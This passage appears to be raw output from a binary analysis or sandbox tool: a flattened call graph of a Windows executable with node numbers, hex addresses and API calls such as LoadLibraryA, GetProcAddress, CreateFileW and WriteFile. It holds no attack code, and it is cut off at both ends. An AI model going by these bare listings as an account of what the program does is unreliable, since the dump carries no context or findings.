c7d49c 98628->98630 99740 c43041 7 API calls 98629->99740 99741 c448fe LoadImageW EnumResourceNamesW 98630->99741 98633 c43b46 98635 c439e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98633->98635 98634 c7d4a5 98635->98490 98637 c44406 _memset 98636->98637 99742 c44213 98637->99742 98641 c444a5 Shell_NotifyIconW 98644 c444b3 98641->98644 98642 c444c1 Shell_NotifyIconW 98642->98644 98643 c4448b 98643->98641 98643->98642 99746 c4410d 98644->99746 98646 c444ba 98646->98492 98648 c850ed 98647->98648 98662 c50b55 98647->98662 99831 caa0b5 89 API calls 4 library calls 98648->99831 98650 c50e5a 98650->98497 98653 c51044 98653->98650 98654 c51051 98653->98654 99829 c511f3 341 API calls Mailbox 98654->99829 98655 c50bab PeekMessageW 98688 c50b65 Mailbox 98655->98688 98657 c51058 LockWindowUpdate DestroyWindow GetMessageW 98657->98650 98660 c5108a 98657->98660 98659 c852ab Sleep 98659->98688 98663 c86082 TranslateMessage DispatchMessageW GetMessageW 98660->98663 98661 c50e44 98661->98650 99828 c511d0 10 API calls Mailbox 98661->99828 98662->98688 99832 c49fbd 60 API calls 98662->99832 99833 c968bf 341 API calls 98662->99833 98663->98663 98665 c860b2 98663->98665 98665->98650 98666 c8517a TranslateAcceleratorW 98667 c50fa3 PeekMessageW 98666->98667 98666->98688 98667->98688 98668 c50fbf TranslateMessage DispatchMessageW 98668->98667 98669 c60ff6 59 API calls Mailbox 98669->98688 98670 c50e73 timeGetTime 98670->98688 98671 c85c49 WaitForSingleObject 98673 c85c66 GetExitCodeProcess CloseHandle 98671->98673 98671->98688 98710 c510f5 98673->98710 98674 c50fdd Sleep 98703 c50fee Mailbox 98674->98703 98675 c481a7 59 API calls 98675->98688 98676 c477c7 59 API calls 98676->98703 98677 c85f22 Sleep 98677->98703 98679 c4b89c 314 API calls 98679->98688 98681 c60719 timeGetTime 98681->98703 98682 c510ae timeGetTime 99830 c49fbd 60 API calls 98682->99830 98685 c49997 84 API calls 98685->98688 98686 c85fb9 GetExitCodeProcess 98692 c85fcf WaitForSingleObject 98686->98692 98693 c85fe5 CloseHandle 98686->98693 98688->98655 98688->98659 98688->98661 98688->98666 98688->98667 98688->98668 98688->98669 98688->98670 98688->98671 98688->98674 98688->98675 98688->98677 98688->98679 98688->98682 98688->98685 98701 c49fbd 60 API calls 98688->98701 98688->98703 98705 c4a000 314 API calls 98688->98705 98709 c47f41 59 API calls 98688->98709 98688->98710 98712 caa0b5 89 API calls 98688->98712 98714 c48620 69 API calls 98688->98714 98715 c49df0 59 API calls Mailbox 98688->98715 98717 c966f4 59 API calls Mailbox 98688->98717 98718 c48b13 69 API calls 98688->98718 98719 c859ff VariantClear 98688->98719 98720 c85a95 VariantClear 98688->98720 98721 c48e34 59 API calls Mailbox 98688->98721 98722 c85843 VariantClear 98688->98722 98723 c97405 59 API calls 98688->98723 99774 c4e800 98688->99774 99807 c4f5c0 98688->99807 99825 c4e580 341 API calls 98688->99825 99826 c4fe40 341 API calls 2 library calls 98688->99826 99827 c431ce IsDialogMessageW GetClassLongW 98688->99827 99834 cc629f 59 API calls 98688->99834 99835 ca9c9f 59 API calls Mailbox 98688->99835 99836 c9d9e3 59 API calls 98688->99836 99837 c96665 59 API calls 2 library calls 98688->99837 99838 c48561 59 API calls 98688->99838 99839 c4843f 59 API calls Mailbox 98688->99839 98690 cc61ac 110 API calls 98690->98703 98691 c4b93d 109 API calls 98691->98703 98692->98688 98692->98693 98693->98703 98694 c85c9e 98694->98710 98695 c86041 Sleep 98695->98688 98696 c854a2 Sleep 98696->98688 98698 c47f41 59 API calls 98698->98703 98701->98688 98703->98676 98703->98681 98703->98686 98703->98688 98703->98690 98703->98691 98703->98694 98703->98695 98703->98696 98703->98698 98703->98710 99840 ca28f7 60 API calls 98703->99840 99841 c49fbd 60 API calls 98703->99841 99842 c48b13 69 API calls Mailbox 98703->99842 99843 c4b89c 341 API calls 98703->99843 99844 c96a50 60 API calls 98703->99844 99845 ca54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98703->99845 99846 ca3e91 66 API calls Mailbox 98703->99846 98705->98688 98709->98688 98710->98497 98712->98688 98714->98688 98715->98688 98717->98688 98718->98688 98719->98688 98720->98688 98721->98688 98722->98688 98723->98688 98724->98500 98725->98474 98726->98486 98728 c71b90 __ftell_nolock 98727->98728 98729 c44871 GetModuleFileNameW 98728->98729 98730 c47f41 59 API calls 98729->98730 98731 c44897 98730->98731 98732 c448ae 60 API calls 98731->98732 98733 c448a1 Mailbox 98732->98733 98733->98493 98735 c7f173 98734->98735 98736 c47e1f 98734->98736 98738 c48189 59 API calls 98735->98738 100228 c47db0 98736->100228 98740 c7f17e __wsetenvp _memmove 98738->98740 98739 c47e2a 98739->98508 98742 c43d50 __ftell_nolock 98741->98742 98743 c43eb6 Mailbox 98742->98743 98744 c47d2c 59 API calls 98742->98744 98743->98519 98746 c43d82 98744->98746 98754 c43db8 Mailbox 98746->98754 98863 c47b52 98746->98863 98747 c47b52 59 API calls 98747->98754 98748 c43e89 98748->98743 98749 c47f41 59 API calls 98748->98749 98751 c43eaa 98749->98751 98750 c47f41 59 API calls 98750->98754 98752 c43f84 59 API calls 98751->98752 98752->98743 98754->98743 98754->98747 98754->98748 98754->98750 98866 c43f84 98754->98866 98872 c44d13 98755->98872 98760 c7dd0f 98762 c44faa 84 API calls 98760->98762 98761 c44f68 LoadLibraryExW 98882 c44cc8 98761->98882 98764 c7dd16 98762->98764 98766 c44cc8 3 API calls 98764->98766 98769 c7dd1e 98766->98769 98768 c44f8f 98768->98769 98770 c44f9b 98768->98770 98908 c4506b 98769->98908 98772 c44faa 84 API calls 98770->98772 98773 c437e6 98772->98773 98773->98526 98773->98527 98776 c7dd45 98914 c45027 98776->98914 98778 c7dd52 98780 c60ff6 Mailbox 59 API calls 98779->98780 98781 c4380d 98780->98781 98781->98540 98784 c4862b 98782->98784 98783 c48652 98783->98544 98784->98783 99163 c48b13 69 API calls Mailbox 98784->99163 98787 c43f05 98786->98787 98788 c43eec 98786->98788 98790 c47d2c 59 API calls 98787->98790 98789 c481a7 59 API calls 98788->98789 98791 c4388b 98789->98791 98790->98791 98792 c6313d 98791->98792 98793 c631be 98792->98793 98794 c63149 98792->98794 99166 c631d0 60 API calls 3 library calls 98793->99166 98798 c6316e 98794->98798 99164 c68d68 58 API calls __getptd_noexit 98794->99164 98797 c631cb 98797->98565 98798->98565 98799 c63155 99165 c68ff6 9 API calls __read 98799->99165 98801 c63160 98801->98565 98803 c49436 98802->98803 98804 c60ff6 Mailbox 59 API calls 98803->98804 98806 c49444 98804->98806 98805 c43936 98808 c491b0 98805->98808 98806->98805 99167 c4935c 59 API calls Mailbox 98806->99167 99168 c492c0 98808->99168 98810 c491bf 98811 c60ff6 Mailbox 59 API calls 98810->98811 98812 c43944 98810->98812 98811->98812 98813 c49040 98812->98813 98814 c7f5a5 98813->98814 98816 c49057 98813->98816 98814->98816 99178 c48d3b 59 API calls Mailbox 98814->99178 98817 c491a0 98816->98817 98818 c49158 98816->98818 98821 c4915f 98816->98821 99177 c49e9c 60 API calls Mailbox 98817->99177 98820 c60ff6 Mailbox 59 API calls 98818->98820 98820->98821 98821->98593 98823 c45045 85 API calls 98822->98823 98824 ca9854 98823->98824 99179 ca99be 96 API calls 2 library calls 98824->99179 98826 ca9866 98827 c4506b 74 API calls 98826->98827 98854 c7d3c1 98826->98854 98828 ca9881 98827->98828 98829 c4506b 74 API calls 98828->98829 98830 ca9891 98829->98830 98831 c4506b 74 API calls 98830->98831 98832 ca98ac 98831->98832 98833 c4506b 74 API calls 98832->98833 98834 ca98c7 98833->98834 98835 c45045 85 API calls 98834->98835 98836 ca98de 98835->98836 98837 c6594c _W_store_winword 58 API calls 98836->98837 98838 ca98e5 98837->98838 98839 c6594c _W_store_winword 58 API calls 98838->98839 98840 ca98ef 98839->98840 98841 c4506b 74 API calls 98840->98841 98842 ca9903 98841->98842 99180 ca9393 GetSystemTimeAsFileTime 98842->99180 98844 ca9916 98845 ca992b 98844->98845 98846 ca9940 98844->98846 98849 c62f95 _free 58 API calls 98845->98849 98847 ca9946 98846->98847 98848 ca99a5 98846->98848 99181 ca8d90 116 API calls __fcloseall 98847->99181 98851 c62f95 _free 58 API calls 98848->98851 98852 ca9931 98849->98852 98851->98854 98855 c62f95 _free 58 API calls 98852->98855 98853 ca999d 98856 c62f95 _free 58 API calls 98853->98856 98854->98531 98857 c44faa 98854->98857 98855->98854 98856->98854 98858 c44fb4 98857->98858 98859 c44fbb 98857->98859 99182 c655d6 98858->99182 98861 c44fca 98859->98861 98862 c44fdb FreeLibrary 98859->98862 98861->98531 98862->98861 98864 c47faf 59 API calls 98863->98864 98865 c47b5d 98864->98865 98865->98746 98867 c43f92 98866->98867 98871 c43fb4 _memmove 98866->98871 98869 c60ff6 Mailbox 59 API calls 98867->98869 98868 c60ff6 Mailbox 59 API calls 98870 c43fc8 98868->98870 98869->98871 98870->98754 98871->98868 98919 c44d61 98872->98919 98875 c44d3a 98876 c44d53 98875->98876 98877 c44d4a FreeLibrary 98875->98877 98879 c6548b 98876->98879 98877->98876 98878 c44d61 2 API calls 98878->98875 98923 c654a0 98879->98923 98881 c44f5c 98881->98760 98881->98761 99083 c44d94 98882->99083 98885 c44ced 98886 c44cff FreeLibrary 98885->98886 98887 c44d08 98885->98887 98886->98887 98889 c44dd0 98887->98889 98888 c44d94 2 API calls 98888->98885 98890 c60ff6 Mailbox 59 API calls 98889->98890 98891 c44de5 98890->98891 99087 c4538e 98891->99087 98893 c44df1 _memmove 98894 c44e2c 98893->98894 98895 c44f21 98893->98895 98896 c44ee9 98893->98896 98897 c45027 69 API calls 98894->98897 99101 ca9ba5 95 API calls 98895->99101 99090 c44fe9 CreateStreamOnHGlobal 98896->99090 98905 c44e35 98897->98905 98900 c4506b 74 API calls 98900->98905 98901 c44ec9 98901->98768 98903 c7dcd0 98904 c45045 85 API calls 98903->98904 98906 c7dce4 98904->98906 98905->98900 98905->98901 98905->98903 99096 c45045 98905->99096 98907 c4506b 74 API calls 98906->98907 98907->98901 98909 c7ddf6 98908->98909 98910 c4507d 98908->98910 99125 c65812 98910->99125 98913 ca9393 GetSystemTimeAsFileTime 98913->98776 98915 c45036 98914->98915 98916 c7ddb9 98914->98916 99145 c65e90 98915->99145 98918 c4503e 98918->98778 98920 c44d2e 98919->98920 98921 c44d6a LoadLibraryA 98919->98921 98920->98875 98920->98878 98921->98920 98922 c44d7b GetProcAddress 98921->98922 98922->98920 98926 c654ac __read 98923->98926 98924 c654bf 98972 c68d68 58 API calls __getptd_noexit 98924->98972 98926->98924 98927 c654f0 98926->98927 98942 c70738 98927->98942 98928 c654c4 98973 c68ff6 9 API calls __read 98928->98973 98931 c654f5 98932 c654fe 98931->98932 98933 c6550b 98931->98933 98974 c68d68 58 API calls __getptd_noexit 98932->98974 98935 c65535 98933->98935 98936 c65515 98933->98936 98957 c70857 98935->98957 98975 c68d68 58 API calls __getptd_noexit 98936->98975 98939 c654cf @_EH4_CallFilterFunc@8 __read 98939->98881 98943 c70744 __read 98942->98943 98944 c69e4b __lock 58 API calls 98943->98944 98955 c70752 98944->98955 98945 c707c6 98977 c7084e 98945->98977 98946 c707cd 98982 c68a5d 58 API calls 2 library calls 98946->98982 98949 c70843 __read 98949->98931 98950 c707d4 98950->98945 98983 c6a06b InitializeCriticalSectionAndSpinCount 98950->98983 98953 c69ed3 __mtinitlocknum 58 API calls 98953->98955 98954 c707fa EnterCriticalSection 98954->98945 98955->98945 98955->98946 98955->98953 98980 c66e8d 59 API calls __lock 98955->98980 98981 c66ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98955->98981 98966 c70877 __wopenfile 98957->98966 98958 c70891 98988 c68d68 58 API calls __getptd_noexit 98958->98988 98959 c70a4c 98959->98958 98963 c70aaf 98959->98963 98961 c70896 98989 c68ff6 9 API calls __read 98961->98989 98985 c787f1 98963->98985 98964 c65540 98976 c65562 LeaveCriticalSection LeaveCriticalSection _fseek 98964->98976 98966->98958 98966->98959 98990 c63a0b 60 API calls 2 library calls 98966->98990 98968 c70a45 98968->98959 98991 c63a0b 60 API calls 2 library calls 98968->98991 98970 c70a64 98970->98959 98992 c63a0b 60 API calls 2 library calls 98970->98992 98972->98928 98973->98939 98974->98939 98975->98939 98976->98939 98984 c69fb5 LeaveCriticalSection 98977->98984 98979 c70855 98979->98949 98980->98955 98981->98955 98982->98950 98983->98954 98984->98979 98993 c77fd5 98985->98993 98987 c7880a 98987->98964 98988->98961 98989->98964 98990->98968 98991->98970 98992->98959 98996 c77fe1 __read 98993->98996 98994 c77ff7 99080 c68d68 58 API calls __getptd_noexit 98994->99080 98996->98994 98998 c7802d 98996->98998 98997 c77ffc 99081 c68ff6 9 API calls __read 98997->99081 99004 c7809e 98998->99004 99001 c78049 99082 c78072 LeaveCriticalSection __unlock_fhandle 99001->99082 99003 c78006 __read 99003->98987 99005 c780be 99004->99005 99006 c6471a __wsopen_nolock 58 API calls 99005->99006 99010 c780da 99006->99010 99007 c78211 99008 c69006 __invoke_watson 8 API calls 99007->99008 99009 c787f0 99008->99009 99012 c77fd5 __wsopen_helper 103 API calls 99009->99012 99010->99007 99011 c78114 99010->99011 99018 c78137 99010->99018 99014 c68d34 __read 58 API calls 99011->99014 99013 c7880a 99012->99013 99013->99001 99015 c78119 99014->99015 99016 c68d68 __read 58 API calls 99015->99016 99017 c78126 99016->99017 99020 c68ff6 __read 9 API calls 99017->99020 99019 c781f5 99018->99019 99027 c781d3 99018->99027 99021 c68d34 __read 58 API calls 99019->99021 99022 c78130 99020->99022 99023 c781fa 99021->99023 99022->99001 99024 c68d68 __read 58 API calls 99023->99024 99025 c78207 99024->99025 99026 c68ff6 __read 9 API calls 99025->99026 99026->99007 99028 c6d4d4 __alloc_osfhnd 61 API calls 99027->99028 99029 c782a1 99028->99029 99030 c782ce 99029->99030 99031 c782ab 99029->99031 99032 c77f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99030->99032 99033 c68d34 __read 58 API calls 99031->99033 99042 c782f0 99032->99042 99034 c782b0 99033->99034 99036 c68d68 __read 58 API calls 99034->99036 99035 c7836e GetFileType 99037 c783bb 99035->99037 99038 c78379 GetLastError 99035->99038 99040 c782ba 99036->99040 99050 c6d76a __set_osfhnd 59 API calls 99037->99050 99041 c68d47 __dosmaperr 58 API calls 99038->99041 99039 c7833c GetLastError 99043 c68d47 __dosmaperr 58 API calls 99039->99043 99044 c68d68 __read 58 API calls 99040->99044 99045 c783a0 CloseHandle 99041->99045 99042->99035 99042->99039 99046 c77f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99042->99046 99047 c78361 99043->99047 99044->99022 99045->99047 99048 c783ae 99045->99048 99049 c78331 99046->99049 99052 c68d68 __read 58 API calls 99047->99052 99051 c68d68 __read 58 API calls 99048->99051 99049->99035 99049->99039 99054 c783d9 99050->99054 99053 c783b3 99051->99053 99052->99007 99053->99047 99055 c71b11 __lseeki64_nolock 60 API calls 99054->99055 99056 c78594 99054->99056 99077 c7845a 99054->99077 99057 c78443 99055->99057 99056->99007 99058 c78767 CloseHandle 99056->99058 99061 c68d34 __read 58 API calls 99057->99061 99075 c78462 99057->99075 99059 c77f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99058->99059 99060 c7878e 99059->99060 99063 c78796 GetLastError 99060->99063 99064 c7861e 99060->99064 99061->99077 99062 c710ab 70 API calls __read_nolock 99062->99075 99065 c68d47 __dosmaperr 58 API calls 99063->99065 99064->99007 99066 c787a2 99065->99066 99068 c6d67d __free_osfhnd 59 API calls 99066->99068 99067 c70d2d __close_nolock 61 API calls 99067->99075 99068->99064 99069 c799f2 __chsize_nolock 82 API calls 99069->99075 99070 c71b11 60 API calls __lseeki64_nolock 99070->99077 99071 c6dac6 __write 78 API calls 99071->99077 99072 c78611 99074 c70d2d __close_nolock 61 API calls 99072->99074 99073 c785fa 99073->99056 99078 c78618 99074->99078 99075->99062 99075->99067 99075->99069 99075->99072 99075->99073 99076 c71b11 60 API calls __lseeki64_nolock 99075->99076 99075->99077 99076->99075 99077->99056 99077->99070 99077->99071 99077->99075 99079 c68d68 __read 58 API calls 99078->99079 99079->99064 99080->98997 99081->99003 99082->99003 99084 c44ce1 99083->99084 99085 c44d9d LoadLibraryA 99083->99085 99084->98885 99084->98888 99085->99084 99086 c44dae GetProcAddress 99085->99086 99086->99084 99088 c60ff6 Mailbox 59 API calls 99087->99088 99089 c453a0 99088->99089 99089->98893 99091 c45003 FindResourceExW 99090->99091 99095 c45020 99090->99095 99092 c7dd5c LoadResource 99091->99092 99091->99095 99093 c7dd71 SizeofResource 99092->99093 99092->99095 99094 c7dd85 LockResource 99093->99094 99093->99095 99094->99095 99095->98894 99097 c45054 99096->99097 99098 c7ddd4 99096->99098 99102 c65a7d 99097->99102 99100 c45062 99100->98905 99101->98894 99103 c65a89 __read 99102->99103 99104 c65a9b 99103->99104 99106 c65ac1 99103->99106 99115 c68d68 58 API calls __getptd_noexit 99104->99115 99117 c66e4e 99106->99117 99108 c65aa0 99116 c68ff6 9 API calls __read 99108->99116 99109 c65ac7 99123 c659ee 83 API calls 5 library calls 99109->99123 99112 c65ad6 99124 c65af8 LeaveCriticalSection LeaveCriticalSection _fseek 99112->99124 99114 c65aab __read 99114->99100 99115->99108 99116->99114 99118 c66e80 EnterCriticalSection 99117->99118 99119 c66e5e 99117->99119 99120 c66e76 99118->99120 99119->99118 99121 c66e66 99119->99121 99120->99109 99122 c69e4b __lock 58 API calls 99121->99122 99122->99120 99123->99112 99124->99114 99128 c6582d 99125->99128 99127 c4508e 99127->98913 99129 c65839 __read 99128->99129 99130 c6584f _memset 99129->99130 99131 c6587c 99129->99131 99133 c65874 __read 99129->99133 99141 c68d68 58 API calls __getptd_noexit 99130->99141 99132 c66e4e __lock_file 59 API calls 99131->99132 99134 c65882 99132->99134 99133->99127 99143 c6564d 72 API calls 6 library calls 99134->99143 99137 c65869 99142 c68ff6 9 API calls __read 99137->99142 99138 c65898 99144 c658b6 LeaveCriticalSection LeaveCriticalSection _fseek 99138->99144 99141->99137 99142->99133 99143->99138 99144->99133 99146 c65e9c __read 99145->99146 99147 c65ec3 99146->99147 99148 c65eae 99146->99148 99150 c66e4e __lock_file 59 API calls 99147->99150 99159 c68d68 58 API calls __getptd_noexit 99148->99159 99152 c65ec9 99150->99152 99151 c65eb3 99160 c68ff6 9 API calls __read 99151->99160 99161 c65b00 67 API calls 6 library calls 99152->99161 99155 c65ebe __read 99155->98918 99156 c65ed4 99162 c65ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99156->99162 99158 c65ee6 99158->99155 99159->99151 99160->99155 99161->99156 99162->99158 99163->98783 99164->98799 99165->98801 99166->98797 99167->98805 99169 c492c9 Mailbox 99168->99169 99170 c7f5c8 99169->99170 99175 c492d3 99169->99175 99171 c60ff6 Mailbox 59 API calls 99170->99171 99173 c7f5d4 99171->99173 99172 c492da 99172->98810 99175->99172 99176 c49df0 59 API calls Mailbox 99175->99176 99176->99175 99177->98821 99178->98816 99179->98826 99180->98844 99181->98853 99183 c655e2 __read 99182->99183 99184 c655f6 99183->99184 99185 c6560e 99183->99185 99211 c68d68 58 API calls __getptd_noexit 99184->99211 99187 c65606 __read 99185->99187 99188 c66e4e __lock_file 59 API calls 99185->99188 99187->98859 99190 c65620 99188->99190 99189 c655fb 99212 c68ff6 9 API calls __read 99189->99212 99195 c6556a 99190->99195 99196 c6558d 99195->99196 99197 c65579 99195->99197 99209 c65589 99196->99209 99214 c64c6d 99196->99214 99257 c68d68 58 API calls __getptd_noexit 99197->99257 99199 c6557e 99258 c68ff6 9 API calls __read 99199->99258 99206 c655a7 99231 c70c52 99206->99231 99208 c655ad 99208->99209 99210 c62f95 _free 58 API calls 99208->99210 99213 c65645 LeaveCriticalSection LeaveCriticalSection _fseek 99209->99213 99210->99209 99211->99189 99212->99187 99213->99187 99215 c64ca4 99214->99215 99216 c64c80 99214->99216 99220 c70dc7 99215->99220 99216->99215 99217 c64916 _fprintf 58 API calls 99216->99217 99218 c64c9d 99217->99218 99259 c6dac6 99218->99259 99221 c655a1 99220->99221 99222 c70dd4 99220->99222 99224 c64916 99221->99224 99222->99221 99223 c62f95 _free 58 API calls 99222->99223 99223->99221 99225 c64935 99224->99225 99226 c64920 99224->99226 99225->99206 99394 c68d68 58 API calls __getptd_noexit 99226->99394 99228 c64925 99395 c68ff6 9 API calls __read 99228->99395 99230 c64930 99230->99206 99232 c70c5e __read 99231->99232 99233 c70c82 99232->99233 99234 c70c6b 99232->99234 99236 c70d0d 99233->99236 99238 c70c92 99233->99238 99411 c68d34 58 API calls __getptd_noexit 99234->99411 99416 c68d34 58 API calls __getptd_noexit 99236->99416 99237 c70c70 99412 c68d68 58 API calls __getptd_noexit 99237->99412 99241 c70cb0 99238->99241 99242 c70cba 99238->99242 99413 c68d34 58 API calls __getptd_noexit 99241->99413 99244 c6d446 ___lock_fhandle 59 API calls 99242->99244 99243 c70cb5 99417 c68d68 58 API calls __getptd_noexit 99243->99417 99247 c70cc0 99244->99247 99249 c70cd3 99247->99249 99250 c70cde 99247->99250 99248 c70d19 99418 c68ff6 9 API calls __read 99248->99418 99396 c70d2d 99249->99396 99414 c68d68 58 API calls __getptd_noexit 99250->99414 99253 c70c77 __read 99253->99208 99255 c70cd9 99415 c70d05 LeaveCriticalSection __unlock_fhandle 99255->99415 99257->99199 99258->99209 99260 c6dad2 __read 99259->99260 99261 c6dadf 99260->99261 99264 c6daf6 99260->99264 99360 c68d34 58 API calls __getptd_noexit 99261->99360 99263 c6db95 99366 c68d34 58 API calls __getptd_noexit 99263->99366 99264->99263 99266 c6db0a 99264->99266 99265 c6dae4 99361 c68d68 58 API calls __getptd_noexit 99265->99361 99269 c6db32 99266->99269 99270 c6db28 99266->99270 99287 c6d446 99269->99287 99362 c68d34 58 API calls __getptd_noexit 99270->99362 99271 c6db2d 99367 c68d68 58 API calls __getptd_noexit 99271->99367 99274 c6db38 99276 c6db5e 99274->99276 99277 c6db4b 99274->99277 99363 c68d68 58 API calls __getptd_noexit 99276->99363 99296 c6dbb5 99277->99296 99278 c6dba1 99368 c68ff6 9 API calls __read 99278->99368 99281 c6daeb __read 99281->99215 99283 c6db57 99365 c6db8d LeaveCriticalSection __unlock_fhandle 99283->99365 99284 c6db63 99364 c68d34 58 API calls __getptd_noexit 99284->99364 99288 c6d452 __read 99287->99288 99289 c6d4a1 EnterCriticalSection 99288->99289 99290 c69e4b __lock 58 API calls 99288->99290 99291 c6d4c7 __read 99289->99291 99292 c6d477 99290->99292 99291->99274 99293 c6d48f 99292->99293 99369 c6a06b InitializeCriticalSectionAndSpinCount 99292->99369 99370 c6d4cb LeaveCriticalSection _doexit 99293->99370 99297 c6dbc2 __ftell_nolock 99296->99297 99298 c6dc20 99297->99298 99299 c6dc01 99297->99299 99330 c6dbf6 99297->99330 99304 c6dc78 99298->99304 99305 c6dc5c 99298->99305 99380 c68d34 58 API calls __getptd_noexit 99299->99380 99300 c6c836 __cftoe2_l 6 API calls 99302 c6e416 99300->99302 99302->99283 99303 c6dc06 99381 c68d68 58 API calls __getptd_noexit 99303->99381 99308 c6dc91 99304->99308 99386 c71b11 60 API calls 3 library calls 99304->99386 99383 c68d34 58 API calls __getptd_noexit 99305->99383 99371 c75ebb 99308->99371 99309 c6dc61 99384 c68d68 58 API calls __getptd_noexit 99309->99384 99310 c6dc0d 99382 c68ff6 9 API calls __read 99310->99382 99315 c6dc9f 99317 c6dff8 99315->99317 99387 c69bec 58 API calls 2 library calls 99315->99387 99316 c6dc68 99385 c68ff6 9 API calls __read 99316->99385 99318 c6e016 99317->99318 99319 c6e38b WriteFile 99317->99319 99322 c6e13a 99318->99322 99328 c6e02c 99318->99328 99323 c6dfeb GetLastError 99319->99323 99332 c6dfb8 99319->99332 99333 c6e22f 99322->99333 99335 c6e145 99322->99335 99323->99332 99324 c6dccb GetConsoleMode 99324->99317 99326 c6dd0a 99324->99326 99325 c6e3c4 99325->99330 99392 c68d68 58 API calls __getptd_noexit 99325->99392 99326->99317 99327 c6dd1a GetConsoleCP 99326->99327 99327->99325 99354 c6dd49 99327->99354 99328->99325 99329 c6e09b WriteFile 99328->99329 99329->99323 99334 c6e0d8 99329->99334 99330->99300 99332->99325 99332->99330 99337 c6e118 99332->99337 99333->99325 99340 c6e2a4 WideCharToMultiByte 99333->99340 99334->99328 99341 c6e0fc 99334->99341 99335->99325 99342 c6e1aa WriteFile 99335->99342 99336 c6e3f2 99393 c68d34 58 API calls __getptd_noexit 99336->99393 99338 c6e123 99337->99338 99339 c6e3bb 99337->99339 99389 c68d68 58 API calls __getptd_noexit 99338->99389 99391 c68d47 58 API calls 2 library calls 99339->99391 99340->99323 99352 c6e2eb 99340->99352 99341->99332 99342->99323 99346 c6e1f9 99342->99346 99346->99332 99346->99335 99346->99341 99347 c6e128 99390 c68d34 58 API calls __getptd_noexit 99347->99390 99348 c6e2f3 WriteFile 99351 c6e346 GetLastError 99348->99351 99348->99352 99351->99352 99352->99332 99352->99333 99352->99341 99352->99348 99353 c77cae WriteConsoleW CreateFileW __putwch_nolock 99358 c6de9f 99353->99358 99354->99332 99355 c6de32 WideCharToMultiByte 99354->99355 99356 c7650a 60 API calls __write_nolock 99354->99356 99354->99358 99388 c63835 58 API calls __isleadbyte_l 99354->99388 99355->99332 99357 c6de6d WriteFile 99355->99357 99356->99354 99357->99323 99357->99358 99358->99323 99358->99332 99358->99353 99358->99354 99359 c6dec7 WriteFile 99358->99359 99359->99323 99359->99358 99360->99265 99361->99281 99362->99271 99363->99284 99364->99283 99365->99281 99366->99271 99367->99278 99368->99281 99369->99293 99370->99289 99372 c75ec6 99371->99372 99373 c75ed3 99371->99373 99374 c68d68 __read 58 API calls 99372->99374 99375 c75edf 99373->99375 99376 c68d68 __read 58 API calls 99373->99376 99377 c75ecb 99374->99377 99375->99315 99378 c75f00 99376->99378 99377->99315 99379 c68ff6 __read 9 API calls 99378->99379 99379->99377 99380->99303 99381->99310 99382->99330 99383->99309 99384->99316 99385->99330 99386->99308 99387->99324 99388->99354 99389->99347 99390->99330 99391->99330 99392->99336 99393->99330 99394->99228 99395->99230 99419 c6d703 99396->99419 99398 c70d91 99432 c6d67d 59 API calls __read 99398->99432 99399 c70d3b 99399->99398 99401 c70d6f 99399->99401 99402 c6d703 __lseeki64_nolock 58 API calls 99399->99402 99401->99398 99403 c6d703 __lseeki64_nolock 58 API calls 99401->99403 99405 c70d66 99402->99405 99406 c70d7b CloseHandle 99403->99406 99404 c70d99 99407 c70dbb 99404->99407 99433 c68d47 58 API calls 2 library calls 99404->99433 99408 c6d703 __lseeki64_nolock 58 API calls 99405->99408 99406->99398 99409 c70d87 GetLastError 99406->99409 99407->99255 99408->99401 99409->99398 99411->99237 99412->99253 99413->99243 99414->99255 99415->99253 99416->99243 99417->99248 99418->99253 99420 c6d723 99419->99420 99421 c6d70e 99419->99421 99426 c6d748 99420->99426 99436 c68d34 58 API calls __getptd_noexit 99420->99436 99434 c68d34 58 API calls __getptd_noexit 99421->99434 99423 c6d713 99435 c68d68 58 API calls __getptd_noexit 99423->99435 99426->99399 99427 c6d752 99437 c68d68 58 API calls __getptd_noexit 99427->99437 99429 c6d71b 99429->99399 99430 c6d75a 99438 c68ff6 9 API calls __read 99430->99438 99432->99404 99433->99407 99434->99423 99435->99429 99436->99427 99437->99430 99438->99429 99501 c71b90 99439->99501 99442 c448f7 99503 c47eec 99442->99503 99443 c448da 99445 c47d2c 59 API calls 99443->99445 99446 c448e6 99445->99446 99447 c47886 59 API calls 99446->99447 99448 c448f2 99447->99448 99449 c609d5 99448->99449 99450 c71b90 __ftell_nolock 99449->99450 99451 c609e2 GetLongPathNameW 99450->99451 99452 c47d2c 59 API calls 99451->99452 99453 c4741d 99452->99453 99454 c4716b 99453->99454 99455 c477c7 59 API calls 99454->99455 99456 c4717d 99455->99456 99457 c448ae 60 API calls 99456->99457 99458 c47188 99457->99458 99459 c47193 99458->99459 99460 c7ecae 99458->99460 99461 c43f84 59 API calls 99459->99461 99466 c7ecc8 99460->99466 99513 c47a68 61 API calls 99460->99513 99463 c4719f 99461->99463 99507 c434c2 99463->99507 99465 c471b2 Mailbox 99465->98609 99468 c44f3d 136 API calls 99467->99468 99469 c469ef 99468->99469 99470 c7e45a 99469->99470 99471 c44f3d 136 API calls 99469->99471 99472 ca97e5 122 API calls 99470->99472 99473 c46a03 99471->99473 99474 c7e46f 99472->99474 99473->99470 99475 c46a0b 99473->99475 99476 c7e473 99474->99476 99477 c7e490 99474->99477 99479 c46a17 99475->99479 99480 c7e47b 99475->99480 99481 c44faa 84 API calls 99476->99481 99478 c60ff6 Mailbox 59 API calls 99477->99478 99486 c7e4d5 Mailbox 99478->99486 99514 c46bec 99479->99514 99621 ca4534 90 API calls _wprintf 99480->99621 99481->99480 99485 c7e489 99485->99477 99487 c7e689 99486->99487 99491 c7e69a 99486->99491 99498 c47f41 59 API calls 99486->99498 99607 c4766f 99486->99607 99615 c474bd 99486->99615 99622 c9fc4d 59 API calls 2 library calls 99486->99622 99623 c9fb6e 61 API calls 2 library calls 99486->99623 99624 ca7621 59 API calls Mailbox 99486->99624 99488 c62f95 _free 58 API calls 99487->99488 99489 c7e691 99488->99489 99490 c44faa 84 API calls 99489->99490 99490->99491 99495 c62f95 _free 58 API calls 99491->99495 99496 c44faa 84 API calls 99491->99496 99625 c9fcb1 89 API calls 4 library calls 99491->99625 99495->99491 99496->99491 99498->99486 99502 c448bb GetFullPathNameW 99501->99502 99502->99442 99502->99443 99504 c47f06 99503->99504 99506 